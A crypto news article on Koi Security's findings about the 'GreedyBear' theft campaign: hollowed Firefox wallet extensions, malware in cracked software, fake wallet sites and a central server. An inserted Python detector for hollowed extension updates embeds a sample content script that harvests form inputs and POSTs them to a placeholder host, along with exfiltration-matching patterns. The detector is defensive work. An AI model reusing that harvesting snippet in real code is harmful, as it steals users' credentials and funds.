Crypto Thieves Dubbed ‘GreedyBear’ Run Industrial-Scale Scam – Details

bitcoinist, published 2025-08-10, updated 2025-08-10


A cybercrime group called “GreedyBear” has been accused of stealing over $1 million through what researchers say is one of the most wide-reaching crypto theft operations seen in months.

Reports from Koi Security reveal that the group is running a coordinated campaign that mixes malicious browser extensions, Windows malware, and scam websites, all operated from one network.

Extensions Turned Into Wallet-Stealing Tools

Instead of focusing on just one method, GreedyBear has combined several. According to Koi Security researcher Tuval Admoni, the group has deployed more than 650 malicious tools in its latest push.

This marks a sharp rise from its earlier “Foxy Wallet” operation in July, which involved 40 Firefox extensions.

The group’s tactic, called “Extension Hollowing,” starts with publishing clean-looking Firefox add-ons such as video downloaders or link cleaners.

These extensions, released under fresh publisher accounts, collect fake positive reviews to appear trustworthy. Later, the same listings are updated with malicious versions that impersonate wallets such as MetaMask, TronLink, Exodus, and Rabby Wallet. Because the reviews and install base belong to the listing, the malicious build reaches existing users as an ordinary update.

Once installed, the malicious version captures the credentials users type into its input fields and sends them to GreedyBear's control servers.
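One way to catch a "hollowed" update is to diff the add-on's manifest between versions and scan the new content script for input harvesting and exfiltration. The heuristics below are an added example, not Koi Security's tooling; the two manifests, the content script and the collection host (on the reserved `.invalid` TLD) are constructed samples, and the brand list and permission list are assumptions drawn from the wallets named above.

```python
"""Heuristics for an "extension hollowing" update: a benign add-on whose new
version rebrands as a wallet, gains broad permissions, and ships a content
script that reads input fields and posts them to a remote server.

Added example, not Koi Security's tooling. Manifests, script and the
collection host (.invalid TLD) are constructed samples."""
import re

WALLET_BRANDS = ("metamask", "tronlink", "exodus", "rabby")   # assumed watch-list
RISKY_PERMISSIONS = {"<all_urls>", "webRequest", "webRequestBlocking", "tabs",
                     "clipboardRead", "cookies", "scripting"}  # assumed list

def _brands_in(text):
    text = text.lower()
    return [b for b in WALLET_BRANDS if b in text]

def _hosts(manifest):
    hosts = set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        hosts.update(cs.get("matches", []))
    return hosts

def _is_broad(pattern):
    return pattern == "<all_urls>" or re.match(r"^\*://\*/", pattern) is not None

def manifest_indicators(old, new):
    """Indicators from the manifest diff of an update old -> new."""
    findings = []
    if _brands_in(new.get("name", "")) and not _brands_in(old.get("name", "")):
        findings.append(("rebrand_to_wallet", f"{old.get('name')} -> {new.get('name')}"))
    gained = (set(new.get("permissions", [])) - set(old.get("permissions", []))) & RISKY_PERMISSIONS
    if gained:
        findings.append(("gained_risky_permissions", sorted(gained)))
    broad = sorted(h for h in _hosts(new) - _hosts(old) if _is_broad(h))
    if broad:
        findings.append(("broad_host_access_added", broad))
    if new.get("content_scripts") and not old.get("content_scripts"):
        scripts = [js for cs in new["content_scripts"] for js in cs.get("js", [])]
        findings.append(("content_script_added", scripts))
    return findings

# Source-level patterns: collect what the user types, then send it off-box.
INPUT_READ = re.compile(
    r"querySelectorAll\(\s*['\"][^'\"]*(?:input|textarea)|"
    r"addEventListener\(\s*['\"](?:input|keyup|change|submit)['\"]")
EXFIL = re.compile(
    r"(?:fetch|navigator\.sendBeacon|\.open)\(\s*(?:['\"]\w+['\"]\s*,\s*)?['\"](https?://[^'\"]+)")

def script_indicators(js_source):
    """Indicators that a content script harvests input fields and exfiltrates."""
    findings = []
    m = INPUT_READ.search(js_source)
    if m:
        findings.append(("reads_input_fields", m.group(0)))
    hosts = sorted({re.match(r"https?://([^/]+)", u).group(1) for u in EXFIL.findall(js_source)})
    if hosts:
        findings.append(("posts_to_remote_host", hosts))
    return findings

def looks_hollowed(old, new, js_source):
    """True when the update rebrands or broadens reach AND the script harvests and exfiltrates."""
    kinds = {k for k, _ in manifest_indicators(old, new)}
    script = {k for k, _ in script_indicators(js_source)}
    return (bool(kinds & {"rebrand_to_wallet", "broad_host_access_added"})
            and {"reads_input_fields", "posts_to_remote_host"} <= script)

# Constructed samples (not real add-ons).
OLD_MANIFEST = {"manifest_version": 2, "name": "Quick Video Downloader", "version": "1.2",
                "permissions": ["activeTab", "downloads"]}
NEW_MANIFEST = {"manifest_version": 2, "name": "MetaMask Wallet", "version": "1.3",
                "permissions": ["activeTab", "storage", "tabs", "<all_urls>"],
                "content_scripts": [{"matches": ["<all_urls>"], "js": ["popup.js"]}]}
NEW_SCRIPT = """
document.addEventListener('submit', function () {
  var fields = document.querySelectorAll('input, textarea');
  var out = {};
  fields.forEach(function (f) { out[f.name || f.id] = f.value; });
  fetch('https://collector.example.invalid/api/v1/log', {method: 'POST', body: JSON.stringify(out)});
});
"""

if __name__ == "__main__":
    for kind, detail in manifest_indicators(OLD_MANIFEST, NEW_MANIFEST) + script_indicators(NEW_SCRIPT):
        print(f"{kind}: {detail}")
    print("hollowed:", looks_hollowed(OLD_MANIFEST, NEW_MANIFEST, NEW_SCRIPT))
```

The regexes are deliberately loose; a real review would unpack the signed XPI and compare against the previous version rather than trust the store listing, since the listing's reviews and install count predate the swap.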

Malware Hidden In Pirated Software

Investigators have also tied nearly 500 malicious Windows executables to the same group. Many belong to known malware families: the LummaStealer infostealer, ransomware the researchers liken to Luca Stealer, and trojans that act as loaders for further payloads.

Distribution frequently runs through Russian-language websites that host cracked or "repacked" software. By targeting people looking for free software, the attackers reach well beyond the crypto community.

Koi Security also found modular malware whose operators can add or swap capabilities without shipping entirely new files.

Total crypto market cap currently $3.9 trillion. Chart: TradingView

Fake Crypto Services Created To Swipe Data

In addition to the browser attacks and malware, GreedyBear is reported to have set up fraudulent websites that pose as genuine cryptocurrency services.

Some purport to sell hardware wallets; others pose as wallet repair services for devices such as Trezor.

Also on offer are polished-looking fake wallet apps that trick users into entering recovery phrases, private keys, and payment details.

Unlike standard phishing sites that copy exchange login pages, these scam pages look more like product or support portals.

Some of these sites are reportedly still live and collecting sensitive data, while others are parked for future use.

Investigators found that nearly all domains tied to these operations resolve to a single IP address, 185.208.156.66. That server acts as the campaign's hub: it receives stolen credentials, coordinates the ransomware activity, and hosts the scam sites.


Christian, a journalist and editor with leadership roles in Philippine and Canadian media, is fueled by his love for writing and cryptocurrency. Off-screen, he's a cook and cinephile who's constantly intrigued by the size of the universe.
